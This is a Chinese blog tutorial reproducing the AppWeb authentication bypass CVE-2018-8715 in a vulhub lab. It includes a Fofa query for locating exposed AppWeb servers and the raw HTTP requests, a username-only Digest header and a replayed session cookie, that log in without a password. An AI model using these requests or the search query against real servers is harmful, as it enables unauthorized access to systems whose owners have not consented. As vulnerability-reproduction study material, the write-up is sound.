实战AppWeb认证绕过漏洞（CVE-2018-8715）复现

最近可能会更新一些关于漏洞复现的文章，因为最近没事在找一些漏洞来复现，有新的有旧的，新手想要学习就可以看看我这里的复现文章，我文章中尽量写的从新手方面出发，同时文章中不涉及的我会给出链接让大家去学习。

ok，正文开始

受影响版本：7.0.3之前的版本

Fofa语句搜索：（注：fofa搜索可以快速让你在网上找到你想要的网站，百度fofa即可访问）

title="Appweb" && country="CN"
//没找到更好的，暂时凑合用

正文：

首先是运行靶场，这里使用的是vulhub靶场，启动的目录是./appweb/CVE-2018-8715

首先我们先cd到启动目录下然后：

启动命令：docker-compose up -d

关于vulhub靶场安装的方式可参考官网

https://vulhub.org/#/docs/

启动环境之后我们直接访问

http://192.168.0.110:8080/ //这里替换成你自己的靶机IP地址即可

利用这个漏洞我们首先要先知道一个用户名才行，靶场中的是admin

我们打开burp进行拦截，不需要输入密码，只输入用户名我们拦截（注：关于burp的基本使用，大家可以到csdn上搜索burp基本用法即可）

拦截到数据之后，然后我们按ctrl+r发送到重发器，重发器它的作用就是可以将抓到的数据反复发送得到回显，不需要重新抓包再修改不同的数据。

这个时候将左边的全部替换为下面的请求包

GET / HTTP/1.1 Host: example.com 
Accept-Encoding: gzip, deflate Accept: */* 
Accept-Language: en 
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) 
Connection: close 
Authorization: Digest username=admin 

注：看图片中的格式，word中复制出的格式可能会有错，同时使用谷歌浏览器实验的话会有错，不太清楚原因，建议使用firefox

然后我们点击发送之后右边就会出现一个session，我们复制出来

-http-session-=8::http.session::146407b75b2ead88014f60850246044f

然后我们进行下一步，利用我们获取到的cookie，将这个复制出来的放到下面的数据包中红色地方

POST / HTTP/1.1
Host: 192.168.0.110:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Authorization: Digest username=admin
 -http-session-=8::http.session::146407b75b2ead88014f60850246044f
Upgrade-Insecure-Requests: 1
Content-Length: 18
username=admin

将上面代码直接放到proxy中，将红色的地方改成你自己的IP和自己拿到的session

然后我们直接发送，这里不需要到重发器中，直接点击forword即可了。

完成了，我们这里成功登录了进去，复现完成

参考文章：

https://blog.csdn.net/YouthBelief/article/details/121072956

https://vulhub.org/#/environments/appweb/CVE-2018-8715/